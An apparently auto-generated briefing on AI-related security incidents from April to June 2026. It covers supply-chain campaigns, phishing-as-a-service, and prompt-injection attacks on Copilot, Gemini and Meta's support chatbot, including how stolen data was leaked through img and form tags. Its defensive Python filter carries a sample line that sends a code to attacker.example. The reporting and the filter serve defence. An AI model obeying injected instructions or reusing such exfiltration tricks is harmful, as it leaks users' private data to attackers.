AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment

Version 18

2026-06-18 08:13 UTC · 610 items

What

AI is simultaneously being weaponized by attackers and exploited as an attack surface across a cluster of campaigns and disclosures running from late April through mid-June 2026. A maximum-critical vulnerability in Microsoft 365 Copilot, disclosed June 16, allowed attackers to steal 2FA codes and sensitive email data by embedding instructions in third-party content that Copilot processes [8], adding to documented prompt injection exploits against Google Gemini and Meta's AI chatbot. Google's lawsuit against the Chinese Outsider Enterprise network details a phishing-as-a-service model priced at $88/week, with an estimated $1.9 billion in losses since July 2023 and 3.87 million stolen credit card numbers linked to the network by the FBI [17]. The Mini Shai-Hulud supply chain campaign compromised 1,000+ SaaS environments [1], approximately 3,800–4,000 internal GitHub repositories [2], and 30 EU institutions [4]. Separately, Anthropic's Frontier Red Team found that AI use in post-compromise attack phases rose 8.9% among 832 banned malicious accounts [18].

Why it matters

AI is expanding the threat on both sides at once: it lowers the technical barrier for attackers to near zero (phishing-as-a-service at $88/week, AI-written malware in roughly two-thirds of banned accounts) while creating attack surfaces that researchers now characterize as structurally unfixable in current LLM architectures [8]. Autonomous AI cyber capability is doubling approximately every 4.7 months [22], and the two main threat-modeling frameworks defenders rely on, MITRE ATT&CK and MITRE ATLAS, both lack coverage for the autonomous agentic attack mode that is growing fastest [19][24].

Open questions

Ars Technica reports Microsoft and other LLM providers have 'no fundamental fix' for prompt injection and rely on ad hoc guardrails that can be circumvented [8] — has any major provider disputed this characterization or outlined an architectural counter-approach?
SafeBreach documented three distinct Gemini bypass techniques [9][10][11] — has Google issued a structural response, or only patched each vector individually?
The CSA confirms both MITRE ATT&CK and MITRE ATLAS lack coverage for autonomous agentic orchestration [24]. Is either framework body actively working to address this, and on what timeline?
Will the CAISI voluntary framework extend to govern Mythos-class deployment in Glasswing's ~200-partner program, given that expansion without CAISI review is the core governance critique? [21][25]

Narrative

The Mini Shai-Hulud campaign, launched by threat actor TeamPCP on May 11, 2026, has a confirmed impact of more than 1,000 SaaS environments compromised [1], approximately 3,800–4,000 internal GitHub repositories stolen via a poisoned VS Code extension [2][3], and 30 EU institutions breached via the Trivy container scanner [4]. Concurrent campaigns hit additional trust surfaces: an AntV ecosystem attack faked Sigstore provenance badges across 600+ packages [5], TrapDoor compromised 34+ packages across npm, PyPI, and crates.io [6], and 73 Microsoft-signed packages contained credential-stealing code that activated specifically when developers opened them in AI coding agents [7]. GitHub removed the packages citing a terms-of-service violation rather than warning developers that their systems might be compromised; Microsoft did not publicly acknowledge the possibility of malicious content until days after removal [7].

AI-connected products are under attack at multiple layers. A maximum-critical vulnerability in Microsoft 365 Copilot allowed attackers to steal 2FA codes and sensitive email data accessible to Copilot; the bypass wrapped stolen data in HTML constructs — img and form tags — to trigger outbound requests to attacker-controlled servers [8]. Ars Technica reports Microsoft and other providers have no fundamental fix for prompt injection, leaving them to erect 'complicated and ad hoc guardrails' around what it characterizes as 'incurable gullibility' in current LLMs [8]. This assessment fits a pattern: SafeBreach documented three separate bypasses of Google Gemini's defenses via voice injection [9], Google Calendar invites [10], and WhatsApp 'Fake Context Alignment' across six messaging platforms [11]. Meta's AI support chatbot was exploited to take over high-profile Instagram accounts, including the Obama White House account, by asking it to substitute a new email during a password reset; Meta had deployed the bot with direct account-modification authority and no identity verification, and issued an emergency patch after the fact [12][13]. Simon Willison's 'Lethal Trifecta' framework names private data access, exposure to untrusted content, and an exfiltration channel as the structural condition enabling LLM data theft; he argues OpenAI's Lockdown Mode addresses only the third leg, implying ChatGPT's default configuration does not robustly block determined exfiltration [14].
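
The img and form exfiltration pattern described above can be illustrated with a small output filter. This is a minimal sketch, not Microsoft's fix or any vendor's actual guardrail: it assumes assistant output is rendered as HTML, and the names `ALLOWED_HOSTS`, `EgressFinder`, and `find_untrusted_egress`, along with the host `static.example.com`, are hypothetical. It flags img and form tags whose URLs point outside an allowlist, which is the kind of ad hoc guardrail the reporting describes rather than a structural cure.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would define its own trusted hosts.
ALLOWED_HOSTS = {"static.example.com"}

# (tag, attribute) pairs that cause a request when rendered or submitted.
URL_ATTRS = {("img", "src"), ("form", "action")}


class EgressFinder(HTMLParser):
    """Collects img/form URLs that point at hosts outside the allowlist."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.violations = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before this call.
        for name, value in attrs:
            if (tag, name) not in URL_ATTRS or not value:
                continue
            try:
                host = urlparse(value).hostname
            except ValueError:
                # Unparseable URLs are treated as suspicious.
                self.violations.append((tag, value))
                continue
            # Relative URLs have no hostname and stay on the rendering origin.
            if host is not None and host not in self.allowed_hosts:
                self.violations.append((tag, value))


def find_untrusted_egress(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (tag, url) pairs that would send a request to an untrusted host."""
    finder = EgressFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.violations


if __name__ == "__main__":
    sample = '<p>Done.</p><img src="https://attacker.example/c?code=123456">'
    print(find_untrusted_egress(sample))
```

A filter like this only narrows the exfiltration channel. It does nothing about the injected instructions themselves, and it would miss any outbound channel not listed in `URL_ATTRS`.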

AI is also being deployed at scale to run attacks with minimal technical skill. Google sued the Chinese Outsider Enterprise network for operating phishing-as-a-service toolkits on Telegram at $88/week, with 290+ pre-built templates requiring no coding ability and including instructions for using Gemini to build fake websites impersonating Google, YouTube, government agencies, banks, and toll agencies [15][16][17]. The FBI links the network to 3.87 million stolen credit card numbers; the group is estimated to have caused $1.9 billion in losses since July 2023, sent 2.5 million fraudulent texts to Android users, and generated 9,000 fake websites [17]. Anthropic's Frontier Red Team found corroborating aggregate data in 832 banned malicious accounts: 67.3% used AI to write malware, AI use in post-compromise attack phases rose 8.9% [18], and medium-to-high risk actors grew from 33% to 56% — roughly a 1.7-fold increase — with traditional signals such as technique count no longer reliably separating sophisticated from novice attackers [19].

Governance is running behind capability. NIST's CAISI framework evaluates submitted models but does not cover deployment programs [20]. Anthropic's Project Glasswing — now at approximately 200 partners in 15+ countries across power, water, healthcare, and critical infrastructure — reports 10,000+ high- or critical-severity flaws found using Mythos Preview, and Anthropic argues controlled deployment under structured conditions is preferable to waiting while competitors deploy comparable capability without safeguards [21]. AISI measured autonomous AI cyber capability as doubling approximately every 4.7 months, with Claude Mythos as the first AI to complete both UK offensive cyber ranges autonomously [22][23]. The Cloud Security Alliance confirmed that both MITRE ATT&CK and MITRE ATLAS lack coverage for the autonomous agentic orchestration attack mode this capability class enables [24], and neither framework body has publicly responded to the documented gap.
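
To make the 4.7-month doubling figure concrete, the short calculation below converts a doubling time into a growth multiple. It is a sketch that assumes steady exponential growth at the reported rate, which the source measurement does not guarantee will continue; the function names are illustrative.

```python
import math


def growth_factor(months, doubling_months=4.7):
    """Capability multiple after `months`, assuming a constant doubling time."""
    return 2 ** (months / doubling_months)


def months_to_reach(multiple, doubling_months=4.7):
    """Months needed to reach `multiple` times today's level, same assumption."""
    return doubling_months * math.log2(multiple)


if __name__ == "__main__":
    # Under this assumption, one year corresponds to a bit under a 6x increase.
    print(f"12-month multiple: {growth_factor(12):.2f}")
    print(f"months to 10x: {months_to_reach(10):.1f}")
```

Read this way, a governance process that takes a year to respond would be reacting to capability several times greater than what it originally assessed, if the trend held.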

Timeline

2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate with agreements covering Google, Microsoft, and xAI [20]
2026-05-11: TeamPCP launches Mini Shai-Hulud; 160+ npm and PyPI packages compromised; two OpenAI employee devices breached with code-signing certificates exfiltrated [31][32][33]
2026-05-11: Google GTIG intercepts the first confirmed AI-generated zero-day built by criminals, which targeted a hardcoded trust assumption in 2FA [26][34][35]
2026-05-13: AISI evaluates Claude Mythos Preview as first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability doubling every 4.7 months [31][36][22]
2026-05-18: TeamPCP advertises Mistral AI source code — 450 repositories — for sale at $25,000; Mistral confirms impact [37][38][39]
2026-05-20: GitHub confirms theft of approximately 3,800–4,000 internal repositories via a poisoned Nx Console VS Code extension [2][3][40]
2026-05-23: AntV ecosystem attack confirmed with 600+ packages faking Sigstore provenance badges [5][41]
2026-05-24: CERT-EU confirms European Commission breach across 30 EU institutions via Trivy; Mandiant quantifies 1,000+ SaaS compromises; TrapDoor supply chain attack hits 34+ packages [4][1][6]
2026-05-26: Starlette/ASGI critical vulnerability affects 325M weekly downloads including MCP servers; Microsoft patches four Copilot CVEs following documented data exfiltration [42][29][30]
2026-05-29: Meta issues emergency patch after its AI support chatbot is exploited to take over high-profile Instagram accounts including the Obama White House account [12][13]
2026-06-02: Anthropic expands Project Glasswing to ~200 partners in 15+ countries; reports 10,000+ high- or critical-severity flaws found; releases Claude Security on Opus 4.8 [21]
2026-06-03: Anthropic FRT publishes empirical data on 832 banned attackers: medium-to-high risk actors up 1.7-fold; AI use in post-compromise phases rose 8.9%; MITRE ATT&CK agentic gap identified [19][18]
2026-06-04: SafeBreach documents third Gemini bypass via WhatsApp 'Fake Context Alignment'; Google DeepMind documents malicious websites that detect and target AI agents across six attack types [11][27][9][10]
2026-06-05: Simon Willison introduces 'Lethal Trifecta' framework; argues OpenAI Lockdown Mode addresses only the exfiltration leg of the structural condition enabling LLM data theft [14]
2026-06-08: 73 Microsoft-signed packages with AI-agent-triggered credential stealers blocked; GitHub attributes the removal to a terms-of-service violation [7]
2026-06-11: CSA gap analysis confirms neither MITRE ATT&CK nor MITRE ATLAS fully covers autonomous agentic orchestration [24]
2026-06-12: Google sues Chinese Outsider Enterprise for using Gemini to run phishing-as-a-service: $88/week, 290+ templates, $1.9B in estimated losses, 3.87M stolen credit card numbers per FBI [15][16][17]
2026-06-16: Ars Technica reports maximum-critical M365 Copilot vulnerability allowed 2FA code theft via prompt injection; researchers characterize prompt injection as structurally unfixable in current LLMs [8]

Perspectives

SafeBreach Labs

Has documented three successful bypasses of Google Gemini's prompt injection defenses: voice/audio injection, Google Calendar invites, and WhatsApp 'Fake Context Alignment' across six messaging platforms.

Evolution: Consistent across all three findings; the pattern of repeated bypass of patched defenses reinforces a structural critique.

[9][10][11]

Anthropic

Expanding Project Glasswing to ~200 partners on a proactive-defense rationale: controlled deployment under structured conditions is preferable because Mythos-class capability will be widely available within 6–12 months. Meanwhile, FRT empirical data documents AI democratizing sophisticated post-compromise attack techniques, including 1.7-fold growth in medium-to-high risk actors and an 8.9% rise in AI use in post-compromise phases.

Evolution: FRT data adds empirical grounding to the Glasswing defensive rationale while independently documenting the offensive democratization the project is meant to counter.

[21][19][18]

GitHub / Microsoft

Characterized the theft of 3,800–4,000 internal repositories as having limited impact, attributed the removal of 73 malicious packages to a terms-of-service violation, and patched a maximum-critical Copilot vulnerability allowing 2FA theft that researchers frame as a symptom of prompt injection's structural unfixability.

Evolution: The June 16 Copilot 2FA vulnerability extends the pattern of patch-by-patch responses; Ars Technica's 'no fundamental fix' framing now attaches directly to a Microsoft product disclosure.

[2][7][8]

Google (GTIG / DeepMind / Legal)

GTIG confirmed the first criminal AI-generated zero-day; DeepMind documented malicious websites targeting AI agents; Google Legal sued Outsider Enterprise for using Gemini to deliver phishing-as-a-service at $88/week, causing an estimated $1.9 billion in losses and 3.87 million stolen credit card numbers per FBI.

Evolution: The Outsider Enterprise lawsuit adds a legal enforcement dimension to Google's previously research-only posture, while simultaneously illustrating that Google's own model was weaponized against users.

[26][27][15][17]

Simon Willison

Introduced the 'Lethal Trifecta' (private data access + untrusted content + exfiltration channel) as the structural condition enabling LLM data theft; argues Lockdown Mode addresses only the third leg, and that the Meta AI exploit 'hardly qualifies as prompt injection' — the real failure was Meta granting account-modification authority without identity verification.

Evolution: Consistent; Lockdown Mode analysis extends his design-failure thesis into a general architectural principle, separate from the specific Meta critique.

[14][12]
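
The three legs Willison names can be written down as a simple design-time check. The sketch below is an illustration only, not Willison's tooling or any vendor's API: `AgentConfig` and its field names are hypothetical, and deciding whether a given deployment truly has each capability is a judgment the code cannot make for you.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentConfig:
    """Hypothetical description of what one AI assistant deployment can do."""
    name: str
    reads_private_data: bool         # e.g. mailbox, files, account records
    ingests_untrusted_content: bool  # e.g. inbound email, web pages, invites
    can_send_data_out: bool          # e.g. rendered images, outbound requests


def trifecta_legs(cfg):
    """Return the names of the trifecta legs this configuration exposes."""
    legs = {
        "private data access": cfg.reads_private_data,
        "untrusted content": cfg.ingests_untrusted_content,
        "exfiltration channel": cfg.can_send_data_out,
    }
    return [leg for leg, present in legs.items() if present]


def has_lethal_trifecta(cfg):
    """True only when all three legs are present at once."""
    return len(trifecta_legs(cfg)) == 3


if __name__ == "__main__":
    default = AgentConfig("mail-assistant", True, True, True)
    locked = AgentConfig("mail-assistant-locked", True, True, False)
    for cfg in (default, locked):
        print(cfg.name, has_lethal_trifecta(cfg), trifecta_legs(cfg))
```

In this framing, a mode that removes only the exfiltration leg clears the check for that mode while the default configuration still fails it, which is the shape of the argument made about Lockdown Mode.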

AISI (UK AI Security Institute)

Claude Mythos is the first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability is doubling approximately every 4.7 months, warranting urgent governance attention.

Evolution: Consistent; Anthropic's FRT risk-actor growth data and 6–12 month competitive projection independently corroborate AISI's urgency framing.

[22][23]

AuthMind + Turing Institute CETAS

The CAISI voluntary framework evaluates only submitted models; Anthropic's Glasswing expansion to 200 partners without CAISI review is precisely the unaudited frontier deployment their governance critique describes.

Evolution: Consistent; Anthropic's FRT publication deepens the empirical urgency case without addressing the governance-framework critique.

[25][28][23]

Cloud Security Alliance

Published a gap analysis concluding that both MITRE ATT&CK and MITRE ATLAS lack adequate coverage for autonomous agentic orchestration.

Evolution: Extends the ATT&CK agentic gap Anthropic FRT identified to cover ATLAS as well; neither MITRE body has responded.

[24]

Tensions

Ars Technica reports Microsoft and other LLM providers have 'no fundamental fix' for prompt injection and rely on ad hoc guardrails that bypasses continue to circumvent; Microsoft responds with discrete CVE patches rather than disputing this structural characterization [8][29][30].
GitHub removed 73 malicious Microsoft-signed packages and attributed the removal to a terms-of-service violation; Ars Technica argues this framing misled users about potential system compromise, consistent with GitHub's earlier minimized characterization of the internal repository theft [7][2].
Anthropic argues deploying Glasswing to 200 partners under controlled conditions is preferable to waiting for competitors to deploy Mythos-class capability without safeguards; AuthMind and CETAS argue this expansion without CAISI review is precisely the unaudited frontier deployment their governance critique describes [21][25].
Willison concludes OpenAI Lockdown Mode's existence implies ChatGPT in default settings does not robustly block determined exfiltration; OpenAI has not directly contested this characterization [14].
Willison argues the Meta AI Instagram exploit 'hardly even qualifies as prompt injection' because the failure was Meta granting its support bot direct account-modification authority without identity verification, while Ars Technica frames it as a prompt injection attack demonstrating AI's susceptibility to manipulation [12][13].
Anthropic FRT identified a MITRE ATT&CK coverage gap for agentic orchestration and the CSA extended that finding to ATLAS; neither MITRE body has publicly acknowledged or responded to the gap [19][24].

Sources

[1] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
[2] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
[3] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
[4] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
[5] Mini Shai-Hulud Returns: 600+ Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
[6] TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages... — reactive:ai-offensive-cyber
[7] For the 2nd time in weeks, Microsoft packages laced with credential stealer — Ars Technica AI (2026-06-08)
[8] Critical Copilot vulnerability allowed hackers to steal 2FA code from users — Ars Technica AI (2026-06-16)
[9] Exploiting Gemini via Prompt Injection | SafeBreach Original Research — reactive:ai-security-nexus
[10] Invitation Is All You Need: Hacking Gemini | SafeBreach — reactive:ai-security-nexus
[11] 😺 Google Gemini got hijacked via WhatsApp — The Neuron (2026-06-04)
[12] Hackers duped Meta AI support chatbot to steal celebrity Instagram accounts — Ars Technica AI (2026-06-01)
[13] Hackers Simply Asked Meta AI to Give Them Access to High-Profile Instagram Accounts. It Worked — Simon Willison (2026-06-01)
[14] OpenAI Help: Lockdown Mode — Simon Willison (2026-06-05)
[15] Google sues Chinese cybercrime network that used Gemini to automate scams — Ars Technica AI (2026-06-12)
[16] Google Sues to Stop Chinese Cybercrime Group from Using Its A.I. — reactive:ai-security-nexus
[17] 😺 Google sued the people spamming your phone — The Neuron (2026-06-16)
[18] Gap: Anthropic mapped 832 banned accounts onto MITRE ATT&CK. AI in the back half of attacks jumped 8.9%; phishing dr... — reactive:ai-security-nexus (2026-06-14)
[19] What we learned mapping a year’s worth of AI-enabled cyber threats — Anthropic News (2026-06-03)
[20] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
[21] Expanding Project Glasswing — Anthropic News (2026-06-02)
[22] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
[23] AISI: autonomous AI cyber capability now doubling every 4.7 months — reactive:ai-offensive-cyber
[24] MITRE ATT&CK and ATLAS Agentic Gap Analysis - Lab Space — reactive:ai-security-nexus
[25] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
[26] Google Researchers Detect First AI-Built Zero-Day Exploit in Cyberattack - Bloomberg — reactive:ai-offensive-cyber
[27] This Google DeepMind’s paper is a serious warning for anyone using autonomous agents today. — Rohan Paul Twitter (2026-06-04)
[28] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
[29] Microsoft 365 Copilot Information Disclosure CVEs (CVE-2026-26129, CVE-2026-26164, CVE-2026-33111) | PointGuard AI — reactive:ai-security-nexus
[30] CVE-2026-26137: Microsoft 365 Copilot SSRF Vulnerability — reactive:ai-security-nexus
[31] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
[32] Mini Shai-Hulud: TeamPCP compromette 160+ pacchetti npm e PyPI in un supply chain attack che ha colpito TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
[33] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
[34] Google Detects First AI-Generated Zero-Day Exploit - SecurityWeek — reactive:ai-offensive-cyber
[35] Google spotted an AI-developed zero-day before attackers could use it | CyberScoop — reactive:ai-offensive-cyber
[36] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
[37] TeamPCP vende repo Mistral AI dopo attacco TanStack su OpenAI — reactive:ai-security-nexus (2026-05-18)
[38] Hackers threaten to leak Mistral files online — AI giant confirms breach, but not what data is involved | TechRadar — reactive:ai-offensive-cyber
[39] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
[40] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
[41] Shai-Hulud/Megalodon: A Two-Wave AI Developer Supply Chain ... — reactive:ai-offensive-cybersecurity
[42] Millions of AI agents imperiled by critical vulnerability in open source package — Ars Technica AI (2026-05-26)